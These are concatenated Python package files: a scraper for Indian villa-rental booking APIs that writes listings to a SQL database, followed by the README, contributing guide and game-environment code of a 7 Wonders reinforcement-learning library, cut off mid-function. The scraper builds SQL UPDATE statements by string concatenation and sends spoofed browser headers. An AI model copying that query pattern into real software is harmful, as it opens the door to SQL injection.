response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# DESTRCUTIVE sql query
def vista_sql_destructive(query,cypher_key):
con = db_connection(cypher_key,database="vista")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
def vista_weekly_update_script(cypher_key,search_api_wait=10):
# Get the list of all the current villas lited
vista_search_data = vista_search_locations(get_all=True,wait_time=search_api_wait)
new_slugs = vista_search_data['slug'].values
query = "SELECT slug FROM VISTA_MASTER"
old_slugs = vista_sql_query(query,cypher_key)
old_slugs = old_slugs['slug'].values
# Get the list of recently added and removed slugs
added_slugs = list(set(new_slugs).difference(set(old_slugs)))
removed_slugs = list(set(old_slugs).difference(set(new_slugs)))
# Add the new listings to the Database
vista_newly_added_df = added_villas_dataframe(old_slugs,new_slugs)
vista_current_columns = vista_sql_query("SELECT * FROM VISTA_MASTER LIMIT 2",cypher_key).columns
dropcols = set(vista_newly_added_df).difference(set(vista_current_columns))
try:
vista_newly_added_df.drop(dropcols,axis=1,inplace=True)
except:
pass
if len(vista_newly_added_df) > 0:
vista_newly_added_df['listing_status'] = "LISTED"
vista_newly_added_df['status_on'] = datetime.datetime.today()
vista_newly_added_df['created_on'] = datetime.datetime.today()
# changind all the "Object" data types to str (to avoid some weird error in SQL)
all_object_types = pd.DataFrame(vista_newly_added_df.dtypes)
all_object_types = all_object_types[all_object_types[0]=='object'].index
for column in all_object_types:
vista_newly_added_df[column] = vista_newly_added_df[column].astype('str')
#return vista_newly_added_df
engine = db_connection(cypher_key,database="vista")
for i in range(len(vista_newly_added_df)):
try:
vista_newly_added_df.iloc[i:i+1].to_sql(name='VISTA_MASTER',if_exists='append',con = engine,index=False)
except IntegrityError:
pass
engine.dispose()
# Update listing Statuses
vista_update_listing_status(cypher_key)
# A Summary of the updates
final_success_response = {
"No of Added Villas" : len(added_slugs),
"No of Removed Villas" : len(removed_slugs),
"Added Villas" : added_slugs,
"Removed Villas" : removed_slugs
}
return final_success_response
# Update listing status
def vista_update_listing_status(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for id in vista_data[vista_data['listing_status']=='DELISTED']['id']:
stat = vista_check_if_listed(id)
print(id,stat)
if stat:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='LISTED',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='LISTED']['id']:
stat = vista_check_if_listed(id)
print(id,stat)
if not stat:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='DELISTED',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
# Breadth first seach algorithm to get the blocked dates
def vista_blocked_dates(property_id,ci,co):
# check if the listing is active
lt_status = vista_check_status(property_id)
if lt_status in ["INACTIVE","DELISTED"]:
return {
"id" : property_id,
"blocked_dates" : lt_status
}
# rg = Range => checkout - checkin (in days)
rg = (datetime.datetime.strptime(co, "%Y-%m-%d") - datetime.datetime.strptime(ci, "%Y-%m-%d")).days
api_calls = 0
# This list contains all the date ranges to be checked - there will be additions and subtractions to this list
DTE = [(ci,co,rg)]
# we will add the blocekd dates here
blocked = {}
explored = []
while len(DTE) != 0:
# To see how many API calls happened (fewer the better)
api_calls += 1
# Pick one item (date range) from the DTE list -> to see if it is available
dates = DTE.pop()
print(f"Checking : {dates[0]} for {dates[2]} days")
explored.append(dates)
checkin = dates[0]
checkout = dates[1]
range = dates[2]
# Call the vista API to see of this is available
api_response = vista_price_calculator_api(property_id=property_id,checkin=checkin,checkout=checkout)
# If no error -> it is available, start the next iteration of the loop
if "error" not in api_response.keys():
print("Not Blocked")
continue
# if the range is unavailable do this
else:
print("Blocked")
# if the range is 1, mark the date as blocked
if range == 1:
blocked[checkin] = api_response['data']['price']['amount_to_be_paid']
#blocked.append((checkin,api_response['data']['price']['amount_to_be_paid']))
# if the range is not 1, split the range in half and add both these ranges to the DTE list
else:
checkin_t = datetime.datetime.strptime(checkin, "%Y-%m-%d")
checkout_t = datetime.datetime.strptime(checkout, "%Y-%m-%d")
middle_date = checkin_t + datetime.timedelta(math.ceil(range/2))
first_half = ( str(checkin_t)[:10] , str(middle_date)[:10] , (middle_date - checkin_t).days )
second_half = ( str(middle_date)[:10] , str(checkout_t)[:10] , (checkout_t - middle_date).days)
DTE.extend([first_half,second_half])
response_obj = {
"id" : property_id,
"blocked_dates" : blocked,
"meta_data": {
"total_blocked_dates" : len(blocked),
"api_calls":api_calls,
"checked from": ci,
"checked till":co
#"date_ranges_checked":explored
}
}
return response_obj
# To check if the villa is inactive (Listed but blocked for all dates)
def vista_check_status(property_id="",slug=""):
if vista_check_if_listed(property_id,slug):
status = "LISTED"
else:
status = "DELISTED"
return status
if status == "LISTED":
min_nights = 1
for i in [8,16,32,64,128]:
price = vista_price_calculator_api(property_id , checkin=datetime.date.today()+datetime.timedelta(i), checkout = datetime.date.today()+datetime.timedelta(i + min_nights))
if "error" not in price.keys():
return "LISTED"
if i == 128:
return "INACTIVE"
elif price['error'] == 'Booking Not Available for these dates':
pass
elif isinstance(price['error'].split(" ")[4],int):
min_nights = price['error'].split(" ")[4]
pass
def vista_check_if_listed(property_id="",slug=""):
if len(slug)>0:
try:
listing = vista_listing_api(slug)
property_id = listing['data']['property_detail']['id']
except:
return False
price = vista_price_calculator_api(property_id , checkin=datetime.date.today()+datetime.timedelta(5), checkout = datetime.date.today()+datetime.timedelta(7))
if "error" not in price.keys():
return True
elif isinstance(price['error'],str):
return True
elif 'property_id' in dict(price['error']).keys():
return False
return False
# Update listing status
def vista_update_listing_status_old(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for id in vista_data[vista_data['listing_status']=='DELISTED']['id']:
print(id)
stat = vista_check_status(id)
print(id,stat)
if stat in ["LISTED","INACTIVE"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='LISTED']['id']:
stat = vista_check_status(id)
print(id,stat)
if stat in ["DELISTED","INACTIVE"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='INACTIVE']['id']:
stat = vista_check_status(id)
print(id,stat)
if stat in ["DELISTED","LISTED"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
def vista_update_listing_status(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for i,r in vista_data.iterrows():
try:
old_status = r['listing_status']
cal = vista_availability_api(r['id'])
if "error" in cal.keys():
current_status = "DELISTED"
else:
cal = pd.DataFrame(cal['data'])
cal['date'] = cal['date'].astype('datetime64')
if len(cal[cal['date']< datetime.datetime.today() + datetime.timedelta(90)])/88 > 1:
current_status = "INACTIVE"
else:
current_status = "LISTED"
if old_status != current_status:
print(f"Updating database for {r['id']} - {current_status}...")
query = f"UPDATE VISTA_MASTER SET listing_status='{current_status}',status_on='{str(datetime.datetime.today())}' WHERE id='{r['id']}'"
#print(query)
vista_sql_destructive(query,cypher_key)
else:
print(r['id'], "Unchanged")
except:
pass
"""# Lohono
```
# Lohono API wrappers
# Refining the APIs
# Master DataFrame
```
"""
# List of all lohono locations
def lohono_locations():
locations = ['india-alibaug','india-goa','india-lonavala','india-karjat']
return locations
# lohono Search API wrapper
def lohono_search_api(location_slug="india-goa",page=1):
url = "https://www.lohono.com/api/property"
params = {
'location_slug': location_slug,
'page': page
}
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/{ location_slug.split("-")[-1] }',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload, params=params)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# lohono listing API wrapper
def lohono_listing_api(slug='prop-villa-magnolia-p5sp'):
url = f"https://www.lohono.com/api/property/{slug}"
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://www.lohono.com/villas/india/goa/prop-fonteira-vaddo-a-C6Cn',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload)
listing_data = json.loads(response.text.encode('utf8'))
return listing_data['response']
# lohono Pricing API wrapper
def lohono_pricing_api(slug,checkin,checkout,adult=2,child=0):
url = f"https://www.lohono.com/api/property/{slug}/price"
payload = "{\"property_slug\":\""+slug+"\",\"checkin_date\":\""+str(checkin)+"\",\"checkout_date\":\""+str(checkout)+"\",\"adult_count\":"+str(adult)+",\"child_count\":"+str(child)+",\"coupon_code\":\"\",\"price_package\":\"\",\"isEH\":false}"
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'content-type': 'application/json',
'origin': 'https://www.lohono.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/goa/{slug}?checkout_date={checkout}&adult_count={adult}&checkin_date={checkin}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
response = requests.post(url, headers=headers, data = payload)
pricing_data = json.loads(response.text.encode('utf8'))
return pricing_data
# Basic details from the search API
def lohono_search(location_slugs=lohono_locations()):
page = 1
all_properties = []
for location_slug in location_slugs:
while True:
print(f"page{ page } for {location_slug}")
search_response = lohono_search_api(location_slug,page)
all_properties.extend(search_response['response']['properties'])
if search_response['paginate']['total_pages'] == page:
break
page += 1
return pd.DataFrame(all_properties)
# All details for all the listings
def lohono_master_dataframe():
search_data = lohono_search()
slugs = search_data['property_slug'].values
all_properties = []
for slug in slugs:
print(f"getting {slug}")
listing_raw = lohono_listing_api(slug)
all_properties.append(listing_raw)
all_properties = pd.DataFrame(all_properties)
all_properties['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in all_properties['amenities']]
all_properties['price'] = search_data['rate']
all_properties['search_name'] = search_data['name']
return all_properties | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/vista.py | vista.py |
# 7Wonder-RL-Lib
Library providing environment for testing Reinforcement learning in 7 Wonders Game.
<img alt="GitHub" src="https://img.shields.io/github/license/mirrorcraze/7Wonder-RL-Lib">
<img alt="GitHub issues" src="https://img.shields.io/github/issues/mirrorcraze/7Wonder-RL-Lib">
[](https://codecov.io/gh/MirrorCraze/7Wonder-RL-Lib)
[](https://github.com/MirrorCraze/7Wonder-RL-Lib/actions/workflows/github-code-scanning/codeql)
[](https://github.com/MirrorCraze/7Wonder-RL-Lib/actions/workflows/build.yml)
[](https://pypi.org/project/7Wonder-RL-Lib/0.1.0/)
[](https://mirrorcraze.github.io/7Wonder-RL-Lib/)
## Overview
There are multiple environments for the AI game testing. However, environments implemented now are mostly covered only the traditional board games (Go, Chess, etc.) or 52-card based card games (Poker, Rummy, etc.) where games do not really have interactions with other players.
Most of the Euro-games board games are good game environments to test the algorithm on as there are many aspects to explore, such as tradings, dealing with imperfect informations, stochastic elements, etc.
7 Wonders board games introduced multiple elements mentioned above which are good for testing out new algorithm. This library will cover basic game systems and allow users to customize the environments with custom state space and rewarding systems.
## Installation
To install the gym environment, run
```
make develop
make build
make install
```
## Usage
Example codes of how to declare the gym environment is displayed below
```
import SevenWonEnv
from SevenWonEnv.envs.mainGameEnv import Personality
env = gym.make("SevenWonderEnv", player=4) #Declare Environment with 4 Players
```
To use the Personality that is given (RandomAI, RuleBasedAI, DQNAI, Human), use ```setPersonality(personalityList)```
```
personalityList = []
personalityList.append(Personality.DQNAI)
for i in range(1, 4):
personalityList.append(Personality.RandomAI)
env.setPersonality(personalityList)
```
To run the game each step,
```
stateList = env.step(None)
```
The variable stateList consist of n 4-tuple, depends on number of players. Each tuple are (new_state, reward, done, info).
To add the custom model, change the ```SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/Personality.py``` file.
Each personality will have 2 main functions, which are init and make_choice.
For example, RandomAI takes all possible choices and randomly choose one choice.
```
class RandomAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return random.choice(range(len(options)))
```
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/README.md | README.md |
# CONTRIBUTION GUIDELINE
## Prerequisites
* Python >=3.9
## Contribution
1. Fork the library and clone to your local machine
2. Install library and dependencies using
* ```make develop # Download all prerequisites ```
* ```make build # Build the library```
* ```make install # Install the gym environment```
## Making a PR
1. Run ```make lint``` and ```make test``` and make sure all test passed
2. Submit the PR
## What to focus on now?
* More substantial test (Coverage is still low for now)
* Decoupling Personality.py so that adding new Personality would be easier
* Adding ways to use custom reward function except ones given | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/CONTRIBUTING.md | CONTRIBUTING.md |
import gymnasium as gym
import sys
import copy
from gymnasium import error, spaces, utils
from gymnasium.utils import seeding
import numpy as np
import json
import random
from operator import itemgetter
from SevenWonEnv.envs.mainGameEnv.mainHelper import filterPlayer, buildCard, rotateHand
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import (
Personality,
RandomAI,
RuleBasedAI,
Human,
DQNAI,
)
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
EnvAmount = 0
class SevenWonderEnv(gym.Env):
#Private helper methods
def __loadWonder(self):
fileOper = open("mainGameEnv/Card/wonders_list.json", "rt")
wonderList = json.load(fileOper)
wonderList = wonderList["wonders"]
wonderName = list(wonderList.keys())
fileOper.close()
return wonderList, wonderName
def __actionToCode(self, cardCode, actionCode):
return cardCode * 4 + actionCode
def __codeToAction(self, action):
cardCode = int(action / 4)
actionCode = action % 4
# convert cardCode and actionCode to ones that can be used in step
card = self.dictCard[cardCode]
playlist = self.dictPlay[actionCode]
return card, playlist
def __initActionSpace(self):
counter = 0
fileOper = open("mainGameEnv/Card/card_list.json", "rt")
cardList = json.load(fileOper)
for age in cardList:
for playerNum in cardList[age]:
for color in cardList[age][playerNum]:
for card in cardList[age][playerNum][color]:
if not card["name"] in self.dictCard.values():
self.dictCard[counter] = card["name"]
counter += 1
for key, value in self.dictCard.items():
self.dictCardToCode[value] = key
# for (key,value) in self.dictCardToCode.items():
# print(key,value)
fileOper.close()
# [playStatus,wonder,side,stage] for each card.
self.dictPlay[0] = [0, None, None, None] # playStatus 0 = play with paying cost
self.dictPlay[1] = [
1,
None,
None,
None,
] # playStatus 1 = play with effect freeStructure
self.dictPlay[2] = [
-1,
None,
None,
None,
] # playStatus -1 = discard the card for 3 coins
self.dictPlay[3] = [2, None, None, None] # upgrade wonders
fileOper.close()
metadata = {"render.modes": ["human"]}
def __addPlayer(self, personality):
assignNumber = self.player - self.unAssignedPersonality + 1
self.playerList[assignNumber].assignPersonality(personality)
self.unAssignedPersonality -= 1
print("Player {} is ".format(assignNumber), personality)
def __initGameNPerson(self, player):
self.unAssignedPersonality = player
fileOper = open("mainGameEnv/Card/card_list.json", "rt")
cardList = json.load(fileOper)
cardAge = []
for i in range(1, 4):
cardAge.append(self.getCardAge("age_" + str(i), player, cardList))
fileOper.close()
wonderList, wonderName = self.__loadWonder()
random.shuffle(wonderName)
wonderSelected = wonderName[0:player]
playerList = {}
for i in range(1, player + 1):
newPlayer = Player(i, player, Human)
side = "A" if random.randrange(2) % 2 == 0 else "B"
wonderCurName = wonderSelected[i - 1]
wonderCur = wonderList[wonderCurName]
initialResource = Resource(wonderCur["initial"]["type"], wonderCur["initial"]["amount"])
newWonders = Wonder(wonderCurName, side, initialResource, **wonderList[wonderCurName][side])
newPlayer.assignWonders(newWonders)
playerList[i] = newPlayer
for i in range(1, player + 1):
curPlayer = playerList[i]
playerList[i].assignLeftRight(playerList[curPlayer.left], playerList[curPlayer.right])
print("SETUP COMPLETE")
return cardAge, playerList
def __stateGenerator(self, playerNum):
state = []
for resourceAmount in self.playerList[playerNum].resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].color.values():
state.append(colorAmount)
for eastPrice in self.playerList[playerNum].eastTradePrices.values():
state.append(eastPrice - 1)
for westPrice in self.playerList[playerNum].westTradePrices.values():
state.append(westPrice - 1)
state.append(self.playerList[playerNum].coin)
for resourceAmount in self.playerList[playerNum].left.resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].left.color.values():
state.append(colorAmount)
for resourceAmount in self.playerList[playerNum].right.resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].right.color.values():
state.append(colorAmount)
state.append(self.age - 1)
return state
def printPersonality(self):
for i in range(1, self.player + 1):
print(self.playerList[i].personality)
def __stepActionDict(self):
actionDict = {}
for i in range(1, self.player + 1):
card, action = self.playerList[i].playCard(self.age)
actionDict[i] = self.__actionToCode(card, action)
return actionDict
def __illegalAction(self, action, playerNum):
cardName, actionList = self.__codeToAction(action)
card = self.playerList[playerNum].findCardFromHand(cardName)
info = {}
done = False
reward = 0
if card is None:
return True # Card not on hand
if self.specialAction != 0: # extraTurn from card effect
if self.specialAction == 1: # buildDiscarded
if actionList[0] != 0:
return True # illegal action. A card must be played, not used for wonders or discarded.
elif self.specialAction == 2: # playSeventhCard. Still have to pay (if needed)
if actionList[0] == 2 and self.playerList[playerNum].wonders.stage + 1 >= len(
self.playerList[playerNum].wonders.step
):
return True # illegal action. Can't upgrade wonders if it's already maxed
if actionList[0] == 2 and self.playerList[playerNum].wonders.stage + 1 >= len(
self.playerList[playerNum].wonders.step
):
return True # illegal action. Can't upgrade wonders if it's already maxed
return False
def __rewardCalculation(self, action, playerNum):
cardName, actionList = self.__codeToAction(action)
player = self.playerList[playerNum]
card = player.findCardFromHand(cardName)
info = {}
done = False
reward = 0
if self.__illegalAction(action, playerNum):
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
return vecState, -10000, done, info
left, right = player.playable(card)
if self.specialAction != 0: # extraTurn from card effect
if self.specialAction == 1: # buildDiscarded
left, right = (0, 0)
selectedCard = [card, left, right, actionList[0]]
cardGet, action = player.playChosenCard(selectedCard)
player.assignHand(copy.deepcopy(self.tempCardList))
self.specialAction = 0
player.endTurnEffect = None
# specialAction=2 : playSeventhCard. Still have to pay (if needed)
else:
if actionList[0] != 2: # discard/play
selectedCard = [card, left, right, actionList[0]]
else: # use for upgrade
selectedCard = [
player.wonders.step[player.wonders.stage + 1],
left,
right,
0,
card,
]
cardGet, action = player.playChosenCard(selectedCard)
self.specialAction = 0
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
if self.turn == 6 and "extraPlay" not in info.keys():
for j in range(len(self.playerList)):
self.discarded.append(self.playerList[j + 1].hand[0])
# print(self.playerList[j + 1].hand)
if player.endAgeEffect == "playSeventhCard":
info["extraPlay"] = "playSeventhCard"
self.specialAction = 2
if self.age == 3 and "extraPlay" not in info.keys():
endScore = []
for i in range(len(self.playerList)):
endScore.append((i + 1, self.playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
# for (key, value) in endScore:
# print("Player {} score {}".format(key, value))
for i in range(len(endScore)):
key = endScore[i][0]
# print(key)
if key == playerNum: # endScore[i] is DQN, not RBAI
if i == 0:
reward = 1.5
elif i == 1:
reward = 0.5
elif i == 2:
reward = -0.5
elif i == 3:
reward = -1.5
done = True
elif not "extraPlay" in info.keys(): # end Age
self.age += 1
self.turn = 0
for i in range(len(self.playerList)):
self.playerList[i + 1].assignHand(self.cardShuffled[self.age - 1][i])
if any("freeStructure" in effect for effect in self.playerList[i + 1].endAgeEffect):
self.playerList[i + 1].freeStructure = True
return vecState, reward, done, info
else:
self.turn += 1
if actionList[0] != 2: # discard/play
if actionList[0] == 1: # play with effect = no cost
player.freeStructure = False
left, right = (0, 0)
selectedCard = [card, left, right, actionList[0]]
else:
selectedCard = [
player.wonders.step[player.wonders.stage + 1],
left,
right,
0,
card,
]
cardGet, action = player.playChosenCard(selectedCard)
if action == -1:
self.discarded.append(card)
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
return vecState, reward, done, info
#Public methods
def __init__(self, player):
"""
Initialize the environment with given amount of player
Args:
player: amount of player
"""
global EnvAmount
super(SevenWonderEnv, self).__init__()
self.player = player
self.dictPlay = {}
self.dictCard = {}
self.dictCardToCode = {}
self.personalityList = []
self.__initActionSpace()
path = "GameLog/gameLog" + str(EnvAmount) + ".txt"
EnvAmount = EnvAmount + 1
# sys.stdout = open(path, 'w')
# action space
# 75 unique cards to play * (play(2, use effect FREESTRUCTURE and NOT use effect) + discard(1) + upgradeWonder(1) = 4 action per card) = 300 total actions
# action = 4*cardCode + actionCode
self.action_space = spaces.Discrete(300)
# observation space
# resourceAmountOwn(11) + colorAmountOwn(7)+ownEastTradingCost(7)+ownWestTradingCost(7)+ coin (1) resourceAmountLeft(11)+colorAmountLeft(7)
# +resourceAmountRight(11)+colorAmountRight(7)+AgeNumber(1)
# =observation_space of 70
obserSpaceSize = (
([5] * 10 + [20] + [10] * 7 + [2] * 7 + [2] * 7 + [100])
+ ([5] * 10 + [20] + [10] * 7)
+ ([5] * 10 + [20] + [10] * 7)
+ [3]
)
self.observation_space = spaces.MultiDiscrete(obserSpaceSize)
self.discarded = []
self.cardAge = None
self.playerList = None
self.age = 1
self.turn = 0
self.cardShuffled = []
self.specialAction = 0
self.tempCardList = []
self.unAssignedPersonality = 0
self.cardAge, self.playerList = self.__initGameNPerson(self.player)
for ageNum in range(1, 4):
cardThisAge = self.cardAge[ageNum - 1]
random.shuffle(cardThisAge)
self.cardShuffled.append([cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)])
for i in range(len(self.cardShuffled[0])):
self.playerList[i + 1].assignHand(self.cardShuffled[0][i])
print("Setup complete")
def setPersonality(self, personalityList):
"""
Set the personality for each player.
Args:
personalityList: List[Personality]
"""
self.personalityList = personalityList
for personality in personalityList:
if self.unAssignedPersonality == 0:
sys.exit("Program Stopped : Add too many players' personality")
self.__addPlayer(personality)
def getCardAge(self, age, player, cardList):
jsonAge = filterPlayer(cardList[age], player)
cardAge = []
for color in jsonAge:
for card in jsonAge[color]:
card = buildCard(card["name"], color, card["payResource"], card["getResource"])
cardAge.append(card)
return cardAge
def step(self, action):
"""
Proceed one turn of the game.
Args:
action: 0 by default.
Returns:
List[tuple] containing (new_state, reward, done, info)
"""
if self.unAssignedPersonality != 0:
sys.exit("Program Stopped : Some Players do not have personality.")
rewardAll = []
for j in range(0, len(self.playerList)):
card, action = self.playerList[j + 1].playCard(self.age)
print("Card, action", card, action)
actionCode = self.__actionToCode(self.dictCardToCode[card.name], action)
vecState, reward, done, info = self.__rewardCalculation(actionCode, j + 1)
rewardAll.append((vecState, reward, done, info))
if action == -1: # card discarded
self.discarded.append(card)
print("PLAYER {} discard {}".format(j + 1, card.name))
elif action == 2:
print("PLAYER {} upgrade wonders to stage {}".format(j + 1, self.playerList[j + 1].wonders.stage))
else:
print("PLAYER {} play {}".format(j + 1, card.name))
rotateHand(self.playerList, self.age)
for j in range(len(self.playerList)):
player = self.playerList[j + 1]
if player.endTurnEffect == "buildDiscarded":
if not self.discarded:
continue
# print("DISCARDED")
# for dis in self.discarded:
# print(dis.name)
if j == 0:
info["extraPlay"] = "buildDiscarded"
self.specialAction = 1
self.tempCardList = copy.deepcopy(player.hand)
player.hand = self.discarded
else:
card, action = player.playFromEffect(self.discarded, player.endTurnEffect, self.age)
removeCard = None
for disCard in self.discarded:
if disCard.name == card.name:
removeCard = disCard
break
self.discarded.remove(removeCard)
# print("BEFORE AGE" + str(self.age) + "TURN" + str(self.turn))
# for playerNum in self.playerList:
# playerCur = self.playerList[playerNum]
# print("Player " + str(playerCur.player))
# print("Card")
# for card in playerCur.hand:
# print(card.name)
if self.turn == 6 and not "extraPlay" in info.keys():
for j in range(len(self.playerList)):
self.discarded.append(self.playerList[j + 1].hand[0])
# print(self.playerList[j + 1].hand)
if self.playerList[1].endAgeEffect == "playSeventhCard":
info["extraPlay"] = "playSeventhCard"
self.specialAction = 2
if self.age == 3 and not "extraPlay" in info.keys():
endScore = []
for i in range(len(self.playerList)):
endScore.append((i + 1, self.playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
for key, value in endScore:
print("Player {} score {}".format(key, value))
for i in range(len(endScore)):
key = endScore[i][0]
print(key)
if key == 1: # endScore[i] is DQN, not RBAI
if i == 0:
reward = 1.5
elif i == 1:
reward = 0.5
elif i == 2:
reward = -0.5
elif i == 3:
reward = -1.5
done = True
elif "extraPlay" not in info.keys(): # end Age
self.age += 1
self.turn = 0
for i in range(len(self.playerList)):
self.playerList[i + 1].assignHand(self.cardShuffled[self.age - 1][i])
if any("freeStructure" in effect for effect in self.playerList[i + 1].endAgeEffect):
self.playerList[i + 1].freeStructure = True
# print("AFTER AGE" + str(self.age) + "TURN" + str(self.turn))
# for playerNum in self.playerList:
# playerCur = self.playerList[playerNum]
# print("Player " + str(playerCur.player))
# print("Card")
# for card in playerCur.hand:
# print(card.name)
# print("special " + str(self.specialAction))
return rewardAll
def legalAction(self, playerNum):
"""
Given the player number, return all legal actions as a list of action code
Args:
playerNum: The position of player (1-n)
Returns:
List[actionCode]
"""
player = self.playerList[playerNum]
actionCode = range(4)
posAct = []
for card in player.hand:
if self.specialAction == 1: # play from discard
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], 0))
continue
for action in actionCode:
if action == 2: # discard is always available
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 0: # pay normally
left, right = player.playable(card)
if left != -1 and right != -1:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 1: # pay with effect freeStructure
if player.freeStructure:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 3:
steps = player.wonders.step
existedStage = player.wonders.stage + 1
# print(type(steps[existedStage]))
if existedStage < len(steps):
left, right = player.playable(steps[existedStage])
if left != -1 and right != -1:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
return posAct
def reset(self, seed=None, options=None):
"""
Reset the environment after each episode
Args:
seed: Seed ID for randomization
options: Default to None
Returns:
List[State]
"""
self.age = 1
self.turn = 0
self.cardShuffled = []
self.discarded = []
self.cardAge, self.playerList = self.__initGameNPerson(self.player)
self.setPersonality(self.personalityList)
for ageNum in range(1, 4):
cardThisAge = self.cardAge[ageNum - 1]
random.shuffle(cardThisAge)
self.cardShuffled.append([cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)])
for i in range(len(self.cardShuffled[0])):
self.playerList[i + 1].assignHand(self.cardShuffled[0][i])
state = self.__stateGenerator(1)
vecState = np.array(state).reshape((70,))
# (vecState.shape)
return vecState
def render(self, mode="human"):
pass
def close(self):
pass | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/SevenWonderEnv.py | SevenWonderEnv.py |
import random
from sys import stdin
from copy import deepcopy
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
class Personality:
def __init__(self):
pass
def make_choice(self, player, age, options):
pass
class DQNAI(Personality): # placeholder
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
pass
class RuleBasedAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
# return random.choice(range(len(options)))
for choicesIndex in range(len(options)):
if isinstance(options[choicesIndex][0], Stage): # If stage is free, buy it. 50% to buy if it's not free.
if options[choicesIndex][1] + options[choicesIndex][2] == 0 or random.randint(0, 1) % 2 == 0:
return choicesIndex
else:
continue
# options[choicesIndex[3]] is play code. If it's -1, it means discarded. 0 is play with paying, 1 is play with effect.
if age < 3:
posChoice = []
nonDiscard = []
for choicesIndex in range(len(options)):
if options[choicesIndex][3] != -1:
nonDiscard.append(choicesIndex)
nonDiscarded = [option for option in options if option[3] != -1]
if not nonDiscarded: # have only choice by discarding
return random.choice(range(len(options)))
for choicesIndex in range(
len(options)
): # Select Card that gives more than 1 resource. If there are multiple cards, select one randomly
if type(options[choicesIndex][0]).__name__ == "Card":
if options[choicesIndex][0].getResource["type"] == "mixed" and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(
len(options)
): # Select Card that can be selected between resource. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "choose" and options[choicesIndex][3] != -1:
